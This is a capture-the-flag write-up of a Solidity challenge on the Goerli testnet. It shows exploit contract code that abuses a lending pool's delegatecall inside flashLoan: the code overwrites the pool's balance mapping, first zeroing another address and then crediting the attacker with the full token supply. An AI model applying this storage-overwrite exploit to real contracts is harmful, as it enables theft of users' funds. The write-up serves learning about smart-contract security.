## Challenge 1

Deployment transaction: https://goerli.etherscan.io/tx/0x5bf5794db3f5ae6f84803ee79c107bed99b357268ae475ea10e2bbc344854ddd

InSecureum token is a standard ERC-20 token, meaning the issue is likely to be found at the Lender’s pool smart contract.

The Lender pool contract did indeed have an issue, which was the usage of delegateCalls to unknown contracts.

The exploit was made focused at the flashLoan function. The data argument is the key to everything.

### Storage 

    Make sure the memorySlot is the same as the one used by the exploited smart contract. In our case, the one used to store balances was memorySlot1. 

     IERC20 public token;
     mapping(address => uint) public memorySlot1;
     uint public uselessSlot;
     address public here;


    If the exploited smart contract had the following structure:

     mapping(address => uint) public balances;
     IERC20 public token;
     uint public uselessSlot;
     address public here;
    
        Memory slot 0 would be the target.

### Constructor

    Make sure to pass the correct token address.

     constructor(IERC20 _token){
         token = _token;
         here = address(this);
     }


### Part 1
I first generated view functions to get the bytes needed to pass as the 'data' argument for Lender pool's flashLoan function. 

     function bytesGet1(address attackReceiver) public pure returns(bytes memory){
        return abi.encodeWithSignature("attack(address)", attackReceiver);
     }

The attack function was made solely focused on changing data at Lender pool's memory slot that corresponded to balances data. In that case, it was slot one:

     function attack(address attackReceiver) public returns(bool){
        memorySlot1[attackReceiver] = 0;
        
        return true;
    }

The arguments passed to the flashLoan function were: 
     1. exploit contract address 
     2. the data generated with the bytesGet1

Wait a minute!
This did set another address's balance to zero, but where's the money?

### Part 2

Same logic, some small tweaks, complete different result:

     function bytesGet2(address attackRunner) public pure returns(bytes memory){
        
        return abi.encodeWithSignature("attack2(address)", attackRunner);
        
    }

Now we need to implement the attack2 function:

     function attack2(address attackRunner) public returns(bool){
        uint totals = token.totalSupply();
        memorySlot1[attackRunner] = totals;
        
        return true;
    }

The arguments passed to the flashLoan function were: 
     1. exploit contract address 
     2. the data generated with the bytesGet2

Challenge solved!
